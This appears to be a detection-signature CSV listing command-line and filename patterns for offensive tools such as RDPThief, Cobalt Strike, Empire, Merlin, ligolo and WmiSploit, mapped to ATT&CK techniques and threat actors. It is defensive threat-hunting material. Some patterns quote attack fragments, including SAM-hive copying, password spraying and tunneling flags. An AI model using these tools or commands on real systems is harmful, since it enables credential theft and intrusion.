Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2788" "* RDPHook.dll*",".{0,1000}\sRDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","2789" "* rdp-ntlm-info.nse*",".{0,1000}\srdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2790" "* RdpThief.dll*",".{0,1000}\sRdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","2791" "* rdpv.exe*",".{0,1000}\srdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft 
Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","2792" "* rdp-vuln-ms12-020.nse*",".{0,1000}\srdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2793" "* --read *\\* --tcp-connect 127.0.0.1:* --write *",".{0,1000}\s\-\-read\s.{0,1000}\\\\.{0,1000}\s\-\-tcp\-connect\s127\.0\.0\.1\:.{0,1000}\s\-\-write\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","2796" "* ReadFromLsass*",".{0,1000}\sReadFromLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 
- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","2797" "* ReadPEInMemory.exe*",".{0,1000}\sReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","2798" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","2799" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","2800" "* realvnc-auth-bypass.nse*",".{0,1000}\srealvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2801" "* rec2 crde_linux*",".{0,1000}\srec2\scrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2802" "* rec2 crde_macos*",".{0,1000}\srec2\scrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2803" "* Recall folder found: *",".{0,1000}\sRecall\sfolder\sfound\:\s.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","2804" "* received ACK from backdoor*",".{0,1000}\sreceived\sACK\sfrom\sbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - 
T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","2805" "* -Recommended -SprayEmptyPasswords*",".{0,1000}\s\-Recommended\s\-SprayEmptyPasswords.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","2806" "*----------------- Recon & Enumeration Modules -----------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sRecon\s\&\sEnumeration\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","2807" "* reconFTW installer/updater script *",".{0,1000}\sreconFTW\sinstaller\/updater\sscript\s.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2808" "* reconftw.sh *",".{0,1000}\sreconftw\.sh\s.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to 
perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2809" "* RedBackdoorer.py*",".{0,1000}\sRedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2810" "* Redirect Url After Stealing ==> *",".{0,1000}\sRedirect\sUrl\sAfter\sStealing\s\=\=\>\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","2811" "* redirecttosmb.py*",".{0,1000}\sredirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","2812" "* redis-brute.nse*",".{0,1000}\sredis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2813" "* redis-info.nse*",".{0,1000}\sredis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2814" "* redpill.ps1*",".{0,1000}\sredpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2815" "* redsocks.sh*",".{0,1000}\sredsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","2816" "* --reflective-injection *",".{0,1000}\s\-\-reflective\-injection\s.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","2817" "* reg_hive_sam.py*",".{0,1000}\sreg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2818" "* reg_hive_security.py*",".{0,1000}\sreg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2819" "* reg_hive_system.py*",".{0,1000}\sreg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2820" "* reg_recover-rs.exe*",".{0,1000}\sreg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2821" "* RegisterEventSourceW(L""DESKTOP-...""* L""1337*",".{0,1000}\sRegisterEventSourceW\(L\""DESKTOP\-\.\.\.\"".{0,1000}\sL\""1337.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","2822" "* -Registry -AtStartup *",".{0,1000}\s\-Registry\s\-AtStartup\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2823" "* -relayserver *:5555*",".{0,1000}\s\-relayserver\s.{0,1000}\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","2824" "* -remote -bindPipe * -bindPort * 
-security*",".{0,1000}\s\-remote\s\-bindPipe\s.{0,1000}\s\s\-bindPort\s.{0,1000}\s\-security.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","2828" "* -Remote -ExchHostname *",".{0,1000}\s\-Remote\s\-ExchHostname\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","2829" "* --remote gsocket*",".{0,1000}\s\-\-remote\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2830" "* -Remote_Posh -Location *.ps1 -Function Invoke-* -ComputerName *",".{0,1000}\s\-Remote_Posh\s\-Location\s.{0,1000}\.ps1\s\-Function\sInvoke\-.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","2831" "* RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\sRemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2832" "* -RemoteDllHandle *",".{0,1000}\s\-RemoteDllHandle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2834" "* -remotefilepath *\\*.wav*",".{0,1000}\s\-remotefilepath\s.{0,1000}\\\\.{0,1000}\.wav.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","2835" "* RemoteHashRetrieval.ps1*",".{0,1000}\sRemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) 
tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2836" "* --remote-impersonation*",".{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","2837" "* RemoteKeyLogger.dll*",".{0,1000}\sRemoteKeyLogger\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","2841" "* Remotely download Trojan files to *",".{0,1000}\sRemotely\sdownload\sTrojan\sfiles\sto\s.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","2842" "* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*",".{0,1000}\s\-RemotePath\s.{0,1000}\\Windows\\System32\\SAM\s\-LocalPath\s.{0,1000}\\tmp\\.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts 
